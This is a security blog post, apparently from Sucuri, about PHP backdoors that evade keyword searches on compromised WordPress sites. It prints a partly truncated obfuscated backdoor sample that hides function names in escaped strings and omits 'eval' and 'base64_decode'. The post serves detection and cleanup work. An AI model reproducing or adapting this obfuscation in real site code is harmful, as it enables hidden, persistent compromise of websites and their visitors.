Evil backdoors – Part II

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see on online forums people recommending to search for “eval ( base64_decode” and things like that when searching for backdoors. If you review our examples in that article, you can see that it would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y..
ZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2c..
VkQ1hURFFFUm1XbkRTID0xODc5Mjt9″;$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65″;$eva1tYldakBcVSir = “\x73\164\x72\162\x65\166″;$eva1tYldakBoVS1r = “\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160″;$eva1tYidokBoVSjr = “\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64..”;
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr
[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],
$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr =
$eva1tYlbakBcVSir;$eva1tYldakBcVSir = “\x73\164\x72\x65\143\x72\160\164\x72″;$eva1tYlbakBcVSir =
“\x67\141\x6f\133\x70\170\x65″;$eva1tYldakBoVS1r =
“\x65\143\x72\160″;$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r =
$eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Can you see the evilness? It has no “eval” and no “base64_decode” in there. Using common techniques to search for these keywords would find nothing.

We are seeing many WordPress sites compromised with this type of malware/backdoor (specially on shared hosts).

So what do we recommend? Take a look at our post (at the bottom of it) for some ideas on how we find and clean them: Ask Sucuri: Backdoors.


If you have this issue in your site and need someone to clean it up for you, sign up here: Sucuri Signup

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.